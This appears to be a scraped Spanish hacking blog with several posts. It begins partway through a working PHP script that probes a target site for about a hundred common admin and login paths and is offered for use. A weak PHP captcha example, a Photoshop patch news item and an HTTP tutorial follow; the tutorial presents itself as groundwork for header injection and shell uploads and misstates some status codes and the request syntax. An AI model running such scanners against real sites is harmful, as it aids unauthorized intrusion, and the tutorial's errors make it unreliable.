"admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/", "utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/", "login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/"
);
 
foreach($array as $valor){
   $Find= @"http://".$target."/".$valor;
   $Web = @fopen($Find, "r");
   if($Web){
echo " <font color=red>";
      echo "Si - ".$Find."n";
 echo "  -  ";
echo "<a href =$Find>Visit" ;
echo "</a>";
echo "<br>";
echo "</font>";
   }else{
      echo "No - ".$Find."n";
echo "<br>";
   }
   @fclose($Web);
}
?>

</body>
</html>


Estilos.css

c {
color:#FF0000;
font-size:30px;


}

t {
color:#000000;
font-size:25px;
font-family:verdana;
font-weight:bold;

}

in {
color:#FF0000;
font-size:25px;
font-family:verdana;
font-weight:bold;
letter-spacing:-6px;
}

.botonsubmit {
color:#ff0000;
background-color:#000000;
border:1px solid;
font-family:comic sans ms;
} 


Ya saben cualquier duda, consulten al mail del blog.
Muchas gracias a foro.elhacker.net (excelentes programadores) y a Shell Root!

Captcha en php

2010-07-20T20:51:00.000-07:00

Hola, en esta oportunidad, les voy a dejar el code de un captcha hecho en php.

Primero:

¿Que es un captcha?

Captcha, es el acronimo de Prueba de Turing publica y automatica para diferenciar maquinas de humanos.

Se trata de una prueba desafio-respuesta utilizada en compuacion para determianr cuando un usuario es o no humano.

La tipica prueba consiste en que el usuario introduzca un conjunto de caracteres que se muestran en una imagen distorsionada que aparece en pantalla.

Se supone que una maquina no es capaz de comprender e introducir la secuencia de forma correcta.

Bueno,el captcha consta de 3 archivos.

-index.html

-captcha.php

-verifi.php

index.html

<html>

<head>

<title>Verificion de captcha:</title>

</head>

<body>

<center>

<img src="captcha.php"><br></img>

<form method="post" action="verifi.php">

<input type="text" name="verificar">

</center>

</body>

</html>

captcha.php

<?php

$ancho=100;

$alto=30;

$imagen=imagecreate($ancho,$alto);

$amarillo=Imagecolorallocate($imagen,255,255,0);

imagefill($imagen,0,0,$amarillo);

$rojo=Imagecolorallocate($imagen,44,44,99);

$la=rand(1000000,9999999);

session_start();

$_SESSION['numero'] = $la;

ImageString($imagen,5,25,5,$la,$rojo);

for($c=0;$c<=5;$c++)

{

$x1=rand(0,$ancho);

$y1=rand(0,$alto);

$x2=rand(0,$ancho);

$y2=rand(0,$alto);

ImageLine($imagen,$x1,$y1,$x2,$y2,$rojo);

}

Header ("Content-type: image/jpeg");

ImageJPEG ($imagen);

ImageDestroy($imagen);

?>

verifi.php

<?

session_start();

?>

<html>

<head>

<title> g t Comprobar verificacion </title& g t

</head>

<body>

<?

if($_SESSION['numero'] ==$_REQUEST['verificar'])

echo "Captcha correcto";

else

echo "Captcha Incorrecto";

?>

</body<

</html>

Saludos Dr [F]

Vulnerabilidad crítica en Photoshop CS4

2010-07-19T11:05:00.000-07:00

Adobe soluciona lanza una actualización de seguridad que podría permitir la perdida del control del sistema afectado.

Adobe Systems ha publicado un nuevo parche con el que solucionar varias vulnerabilidades críticas en Photoshop CS4 11.0.1 para Windows y Mac, así como en las versiones anteriores de este conocido editor de imágenes.

Se trata de una vulnerabilidad que permite a un atacante tomar el control del sistema por medio de archivos maliciosos usados para instalar pinceles y degradados (.ASL, .ABR o .GDR).

Adobe recomienda a todos los usuarios de Photoshop CS4 se descarguen el parche de seguridad Photoshop CS4 11.0.2 a la mayor brevedad.

Parche: http://www.adobe.com/support/security/bulletins/apsb10-13.html

Fuente: DesarrolloWeb

Protocolo HTTP

2010-07-18T22:03:00.000-07:00

Bueno gente, aca les traigo un tutorial del funcionamiento "basico" del protocolo http, el entender
este protocolo nos puede servir para ataques de tipo HEADER HTTP, Sqli, XSS, bueno basicamente
casi todos o todos los ataques del tipo de vulnerabilidad a nivel web.
comenzemos con lo basico.

0x001 --> Conceptos basicos

0x002 --> Funcionamiento del protocolo HTTP

0X003 --> Envio de datos (Metodos)

0x004 --> Solicitudes

0x005 --> Respuestas

Antes de empezar considero correcto dejar el archivo con el contenido del manual por si a alguno le resulta mas comodo el formato de este es .txt

http://www.megaupload.com/?d=RL30Q8LU

0x001:

Bueno, creo que para no liarnos con todo esto, primero debere de despejar algunas dudas que surgen

en algunas oportunidades para la mejor comprension del manual.

Url: Una url es una direccion (web) que permite el acceso a paginas, archivos.

ejemplo: www.foro.portalhacker.net/index.php

Diferencia entre url y uri:

Un uri (uniform resource identifier) se diferencia de una url en que este permite incluir en la direccion una subdireccion, esto sera mejor con un ejemplo:

estructura de un uri:

http://www.lalala.com/index.php?pagina=2#inicio

Cabecera o Header:

Una cabecera, se refiere a una informacion suplementaria situada al principio de un bloque de informacion que va a ser almacenada o transimitada y que contiene informacion necesaria para el correcto funcionamiento del bloque de datos.

En transmision de informacion de informacion los datos que siguen a la cabecera se denominan cuerpo.

CGI: Tecnologia de la WWW permite a un cliente (navegador) solicitar datos de un programa ejecutado en el servidor. Cgi especifica un estandar para transferir datos entre el cliente y el programa. Es un mecanisimo de comunicaciones entre el servidor web y una aplicacion externa cuyo resultado final de la ejecucion son objetos MIME. Las aplicaciones que se ejecutan en el servidor reciben el nombre de CGI's.

Objeto MIME: Especificaciones dirigidas al intercambio de todo tipo de archivos (texto, audio,

video, etc)

Solicitud http: Conjunto de lineas que el navegador envia al servidor. mas adelante veremos que hay dentro de una solicitud http

0x002:

Funcionamiento del protocolo HTTP:

El proposito del protocolo http es la transferencia de archivos, principalmente en formato HTML

entre el cliente (navegador) y el servidor web.

Comunicacion entre el navegador y el servidor:

En cliente envia encabezados o solicituds http el servidor las decodificaUbica el archivos que solicito el cliente dentro del servidor

el servidor envia los datos que se solicitaron al cliente como respuesta al envio de encabezados (respuesta http)

Solicitud HTTP:

Como dijimos mas arriba, una solicitud http es un conjunto de lineas que el navegador envia el servidor

Esta incluye:

Una linea de solicitud: linea que especifica el tipo de documento solicitado, el metodo que se aplicara y la version del protocolo utilizado.

La linea esta formada por tres elementos que deben estar separados por un espacio.

Campos del encabezado de solicitud: Es un conjunto de lineas opcionales que permiten aportar informacion adicional sobre la solicitud (navegador, so)

cada una de estas lineas esta formada por un nombre que describe el tipo de encabezado y el valor del encabezado.

El cuerpo de la solicitud: Es un conjunto de lineas que deben estar separadas de las lineas

precendetes por una linea en blanco y, por ejemplo permiten que se envien datos

por un comando POST. por lo tanto una solicitud http posee la siguiente sintaxis (, significa reto
rno de carro).

METDO VERSION URL
ENCABEZADO: Valir
... ENCABEZADO: Valor
linea en blanco
cuerpo de la solicitud

EJ:

GET http://es.kioskea.net HTTP/1.0 Accept : Text/html If-Modified-Since :
Saturday, 15-January-2000 14:37:11 GMT User-Agent : Mozilla/4.0
(compatible; MSIE 5.0; Windows 95)

0x003.

Envio de datos (Metodos)

Como todos sabemos hay diferentes formas de enviar los datos en el protocolo http, esto se lo

denomina metodos.

aca dejo alguna lista con algunos metodos

Get: Es el metodo mas usado. Get obtiene cualquier tipo de informacion identificada en el fichero

al que realizemos la peticion. los parametros se pasan por url.

ej: www.miweb.com.ar/index.php?a=archivo1

me explico ?

HEAD: Solicita el encabezado del recurso ubicado en la url especificada. este metodo nos brinda informacion

del servidor, protocolo, y mas informacion que veremos adelante.

POST: Envia datos al programa, pero a diferencia del Get, no pasa los parametros por la url

este es usado para pedir que el servidor acepte informacion enviada desde el cliente. lo que pase de ahi

en adelante es tarea de la aplicacion

OPTIONS: Metodo que nos brinda gran cantidad de informacion, optios nos informa de los metodos de peticion y respuesta que admite el servidor, este metodo condiciona lo que vayamos a hacer si estamos intentando encontrar algun fallo en algun server.

PUT: Es lo contrario a get. si get, lee el codigo del archivo, put, permite modificarlo y

sobreescribir el codigo normal

DELETE: Su propio nombre lo dice permite borrar el archivo que especifiquemos

0x004

Solicitudes:

Ahora vamos a entrar en detalle de lo que puede consultar un navegador a un servidor web cuando se envia una solicitud. veremos un par de solicitudes que aparecen frecuentemente.

Accept: Acepta contenidos aceptable

ej: Accept: text/plain

Accept-Charset: Conjunto de caracteres que son aceptables.

ej: Accept-Charset: iso-8859-5

Accept-Encoding: Codificaciones o compresiones aceptables

ej: Accept-Encoding: compress , gzip

Connection: tipo de conexion que el usuario agente preferiria

ej: Connection: Close

Contengt Lenght: Longitud del cuerpo de la peticion en octetos.

ej: Content-Length: 348

Fecha- Date: Muestra la hora en que se envio el mensaje

ej: date: tue, 15 nov 1994 8:12:31 GMT

Proxy Autorization: Credenciales de autorizacion para conectarse a un proxy

ej: Proxy-Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==

Referer: Muestra la web anterior que ha sido precedida por la web actual.

ej: Referer: http://en.wikipedia.org/wiki/Main_Page.

0x005

Respuestas:

El servidor cuando se le envia una solicitud http, esta obligado a enviar una respuesta a esta cabecera

las cabeceras que puede enviar el servidor pueden ser las siguientes:

Codigos de respuesta:

1 xx Mensajes

Nº Descripcion

100 Conexion rechazada

2xx Operacion exitosa

Nº Descripcion

200 Ok

201-03 Info no oficial

204 Sin contenido

205 Contenido para recargar

3xx Redireccion

Nº Descripcion

301 Mudado permanentemente

302 encontrado

303 vea otros

304 no modificado

305 utilice un proxy

307 Redireccion temporal

4xx Error por parte del cliente

Nº Descripcion

400 Solicitud incorrecta

402 pago requerido

403 prohibido

404 no encontrado

409 conflicto

410 ya no disponible

Ahora veamos mas detalladamente el tipo de respuesta que puede devolver un servidor:

Accept-Ranges: ¿Que tipo de contenido parcial de este rango soporta el servidor

ej: Accept-ranges: Bytes

Content-Encoding: El tipo de codificacion utilizada en los datos

ej: Content-Encoding: gzip

Content-languaje: El lenguaje es el contenido en

ej: content-languaje: da

Content-Lenght: la longitud del cuerpo de la respuesta en octetos

ej: conten-lenght:348

Content-type: El tipo mime de este contenido (formato del archivo)

ej: Content-type: text/html charset=utf-8

Date: La fecha y hora que se envio el mensaje

ej: date: tue, 15 nov 1994 08.12:31 gmt

Last-Modified: Fecha limite para la modificacion del objeto solicitado en formato RFC

ej: Last-modified: tue, 15 nov 1994 12:45:26

Location: Se utiliza en la redireccion, o cuando un nuevo recurso ha sido creado

ej: location: http://www,w2.org/pub/www/people.html

Server: Nombre del servidor

ej: server: Apache/1.3.27 (unix) (Red-hat/linux)

Set cookie: una cookie http

ej: set-cookie: userid=johndoe maxa-age=3600; version=1

Bueno estos conocimientos nos seran de gran ayuda a la hora de realizar a taques que explicare mas adelante tales como header injection, o subir shell mediante put

Un saludo

Dr [F]

Fuente: Wikipedia (mi gran amigo) & http://es.kioskea.net/contents/internet/http.php3